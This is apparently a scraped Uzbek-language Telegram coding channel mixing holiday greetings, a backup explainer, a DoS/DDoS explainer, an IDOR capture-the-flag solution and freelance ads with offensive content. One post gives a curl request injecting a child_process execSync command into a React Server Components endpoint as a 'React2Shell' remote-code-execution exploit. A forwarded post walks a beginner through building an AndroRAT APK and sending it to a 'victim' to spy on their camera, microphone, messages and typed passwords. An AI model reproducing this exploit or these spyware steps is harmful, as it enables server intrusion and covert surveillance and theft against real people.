Missiya: Tizim arxitekturasidagi mantiqiy zaiflikni ekspluatatsiya qilib, Boshqaruvchi profilidagi CTF{...} maxfiy kodini qo'lga kiritish Ro'yxatdan o'tganingizda tizim sizga avtomatik ravishda eng pas yani oxirgi darajani beradi siz esa TASHKILOT BOSHLIG'I malumotlariga kirishingiz kerak
#CyberLab
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ข๐๐ผ๐ฑ๐ฏ๐ฒ๐ธ๐๐ฒ๐
https://t.me/uzcodingblog/556?comment=5752
ZAIFLIK TOPILDI
ZAIFLIK TOPILDI
Qanday ishladi?
Ro'yxatdan o'tganingizda URL manzilda ?id=101 kabi o'zingizning raqamingiz chiqdi. Siz raqamni shunchaki 1 ga o'zgartirdingiz va to'g'ridan-to'g'ri Admin profiliga kirib bordingiz.
Xato qayerda?
Sayt ma'lumot chiqarishdan oldin foydalanuvchini umuman tekshirmagan. Ya'ni, "Bu ma'lumotni so'rayotgan odam rostdan ham shu profil egasimi?" degan mantiqiy tekshiruv kodda yo'q edi. Server shunchaki ko'r-ko'rona ishonib, adminning sirini hammaga ochib berdi.
Yurtimizning muhtaram va aziz ayollari!
Sizlarni 8 mart โ Xalqaro xotin-qizlar bayrami bilan tabriklayman
Mamlakatimiz taraqqiyoti, jamiyat ravnaqi va kelajak avlodni tarbiyalashda xotin-qizlarning oโrni beqiyosdir. Sizlar oโzingizning fidokorona mehnatingiz, yuksak masโuliyatingiz va mehr-oqibatingiz bilan har bir sohada munosib hissa qoโshib kelmoqdasiz.
Shu fayzli bahor ayyomida sizlarga mustahkam sogโliq, oilaviy baxt-saodat, xonadonlaringizga tinchlik-xotirjamlik, masโuliyatli faoliyatingizda ulkan yutuqlar tilayman!
@ozodbekdevv
Please open Telegram to view this post
VIEW IN TELEGRAM
โคโ๐ฅ4โค2๐1
Forwarded from UzCERT Live
#Google #Chrome #Windows #macOS #Linux #zaiflik
Please open Telegram to view this post
VIEW IN TELEGRAM
React2Shell (CVE-2025-55182)
- CVE: CVE-2025-55182
- Nom: React2Shell
- Turi: Remote Code Execution (RCE)
- Taสผsir qiluvchi texnologiyalar: React Server Components, Next.js App Router
- CVSS bahosi: 9.8 โ 10.0 (Critical)
Yaqinda React va Next.js ekotizimida juda xavfli zaiflik aniqlangan. Bu zaiflik React Server Components (RSC) ishlatiladigan serverlarda masofadan turib buyruq bajarishga (Remote Code Execution) imkon beradi.
Muammo RSC โFlight protocolโ maสผlumotlarini notoสปgสปri qayta ishlash bilan bogสปliq. Maxsus tayyorlangan payload orqali hujumchi server tomonda Node.js modullarini chaqirishi va OS buyruqlarini bajarishi mumkin. Shuningdek 15million aholi malumotlari aynan shu zaiflik asosida olingan
- CVE: CVE-2025-55182
- Nom: React2Shell
- Turi: Remote Code Execution (RCE)
- Taสผsir qiluvchi texnologiyalar: React Server Components, Next.js App Router
- CVSS bahosi: 9.8 โ 10.0 (Critical)
@uzcodingblog
Foydalanish:
Ushbu zaiflikdan faqat React oสปrnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
Foydalanilgan texnologiyalar orasida React mavjud boสปlsa bu serverda React2Shell zaifligi boสปlishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
Bu orqali server terminalida whois buyrugสปini berdik va javob ubuntu tarzida chiqadi
Ushbu zaiflikdan faqat React oสปrnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
npm install -g wappalyzer
wappalyzer https://example.com
Foydalanilgan texnologiyalar orasida React mavjud boสปlsa bu serverda React2Shell zaifligi boสปlishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
curl -s -X POST http://example.com:4000/api/rsc/render \
-H "Content-Type: application/json" \
-d '{"flight":"0:require(\"child_process\").execSync(\"whoami\").toString()"}'
Bu orqali server terminalida whois buyrugสปini berdik va javob ubuntu tarzida chiqadi
@uzcodingblog
This media is not supported in your browser
VIEW IN TELEGRAM
โค4
๐ข๐๐ผ๐ฑ๐ฏ๐ฒ๐ธ๐๐ฒ๐
Video message
ESP8266 (ESP-12F)
This media is not supported in the widget
VIEW IN TELEGRAM
๐ฅ4
Backup nima va nima uchun muhim?
@uzcodingblog
Dasturchi sifatida eng katta xatolardan biri โ maโlumotlarga haddan tashqari ishonib qoโyish. Hammasi joyida ishlayotgandek tuyuladi, lekin bitta xatolik, serverdagi nosozlik yoki oddiygina notoโgโri oโchirish butun loyihani yoโqqa chiqarishi mumkin. Backup aynan shunday vaziyatlar uchun kerak. Bu โ maโlumotlarning zaxira nusxasi boโlib, kerak boโlganda tizimni oldingi holatiga qaytarish imkonini beradi. Ayniqsa production tizimlarda backup yoโqligi katta xavf hisoblanadi. Koโpincha muammo yuz bergandan keyin backup haqida oโylay boshlashadi. Aslida esa bu oldindan yoโlga qoโyilishi kerak boโlgan jarayon. Oddiy qilib aytganda, backup โ bu sizning โplan Bโingiz. Yaxshi yondashuv esa juda murakkab emas: muntazam backup olish, uni bir nechta joyda saqlash va vaqti-vaqti bilan tiklab koโrish. Shunda siz kutilmagan holatlarda ham xotirjam ishlay olasiz
Backup qilinmagan loyiha โ bu har doim xavf ostidagi loyiha.
@uzcodingblog
๐Ramazon Hayiti muborak boโlsin!
This media is not supported in your browser
VIEW IN TELEGRAM
๐ฏ2โค1๐1๐1
Ko'pchiligimiz bilamiz DoS, DDoS hujumlar nima ekanligi va qanday vazifa bajarishini. Lekin ko'pchilik adashadigan qism bu ikkalasini farqi nimada? Aksariyat sohaga yangi kirganlar ikkisini bir narsa deb o'ylashadi, ammo bunday emas โ nomi oโxshash, lekin darajasi va taโsiri jihatidan ancha farq qiladi. Batafsilroq tushuntiradigan bo'lsam:
DoS (Denial of Service) โ bu bitta manbadan amalga oshiriladigan hujum. Oddiy qilib aytganda, bitta qurilma serverga juda koโp soโrov yuboradi va uni ortiqcha yuklab qoโyadi. Natijada server javob bera olmay qoladi yoki butunlay ishlamaydi. Bunday hujumni aniqlash va bloklash nisbatan oson โ odatda bitta IP manzilni yopish yetarli boโladi.
DDoS (Distributed Denial of Service) esa ancha murakkab. Bu yerda hujum bitta emas, balki minglab yoki hatto millionlab qurilmalardan bir vaqtda amalga oshiriladi. Koโpincha bu qurilmalar botnet boโladi, yaโni oldindan zararlangan kompyuterlar yoki IoT qurilmalar. Har biri alohida soโrov yuboradi, lekin umumiy bosim serverni yiqitadi.
Asosiy farq โ DoS bitta nuqtadan keladi, DDoS esa tarqatilgan. Shu sababli DDoSโni aniqlash ham, himoyalanish ham ancha qiyin. IP bloklash bu yerda deyarli foyda bermaydi.
@uzcodingblog
2๐ฅ3โค1๐1
Forwarded from V1RU5_team
Bu โ sizga boshqa odamning telefonini masofadan boshqarish imkonini beradigan dastur.
Yaโni siz oโz kompyuteringizda oโtirib, qurbonning telefonidagi hamma narsani koโrasiz va boshqarasiz.
---
Nimalarni qila oladi?
- Telefon qayerda turganini koโrsatadi
- Mikrofonni yoqib, atrofdagi ovozlarni eshitasiz
- Kamera bilan surat olish mumkin
- Xabarlar, kontaktlar, qoโngโiroqlar roโyxati sizda boโladi
- Telefonga fayl yuklash yoki undan fayl olib ketish mumkin
- Klaviaturada nima yozilganini koโrasiz (parollar ham) key
- Telefonni bloklash, ovoz chiqarish, titratish mumkin
---
Qanday ishlatiladi? (hech narsa bilmagan uchun ham tushunarli)
1. Kompyuterga server dasturini yuklab oling (bu AndroRAT ning boshqaruv paneli).
2. Serverda sozlamalarni kiriting:
- Oโz IP manzilingizni yozing (qurbon telefoni sizga ulanishi uchun).
- Kerakli funksiyalarni belgilang (masalan, kamerani yoqish, xabarlarni oโqish).
3. Bir tugma bilan APK fayl yasang (bu dastur telefonga oโrnatiladi).
4. Shu APK faylni qurbonga yuboring (Telegram, WhatsApp, har qanday usul).
5. Qurbon uni oโrnatishi kerak.
*Oโrnatish uchun telefonda โNomaโlum manbalarโ ruxsatini yoqish talab qilinadi.*
6. Qurbon dasturni ochgan zahoti sizning kompyuteringizda telefon paydo boโladi.
7. Endi sichqoncha bilan bosib, istalgan buyruq bering: kamera, mikrofon, fayl olish โ hammasi bir-ikki sekundda ishlaydi.
---
Please open Telegram to view this post
VIEW IN TELEGRAM
โ
Web-sayt va Telegram bot โ biznesingiz uchun zamonaviy yechimlar!
๐ตโโ Fullstack dasturchi sifatida quyidagi xizmatlarimni taklif qilaman
๐ก Nega bu muhim?
โ๏ธ Bogโlanish: @ozodbekdevv | +998932426002
๐ตโโ Fullstack dasturchi sifatida quyidagi xizmatlarimni taklif qilaman
๐ Web-saytlar โ tezkor, zamonaviy, mobil qurilmalarga mos va brendingizga mos dizayn bilan.
๐ค Telegram botlar โ buyurtma, toโlov, mijozlar bilan aloqa kabi jarayonlarni avtomatlashtirish imkoniyati.
๐ก Nega bu muhim?
โ Biznesingiz raqamli maydonga chiqadi
๐Mijozlar bilan aloqa yengillashadi
๐ฅIsh jarayonlari optimallashtiriladi
๐คImidjingiz va ishonchingiz ortadi
๐Sotuvlar va daromad oโsadi
๐จโ๐ผ Har bir loyiha individual yondashuv bilan ishlab chiqiladi โ sizning maqsadingiz biz uchun ustuvor!
โ๏ธ Bogโlanish: @ozodbekdevv | +998932426002
๐ Zamonaviy texnologiyalar โ sizning rivojlanishingiz uchun xizmat qiladi
V1RU5_team
GitHub
GitHub - karma9874/AndroRAT: A Simple android remote administration tool using sockets. It uses java on the client side and pythonโฆ
A Simple android remote administration tool using sockets. It uses java on the client side and python on the server side - karma9874/AndroRAT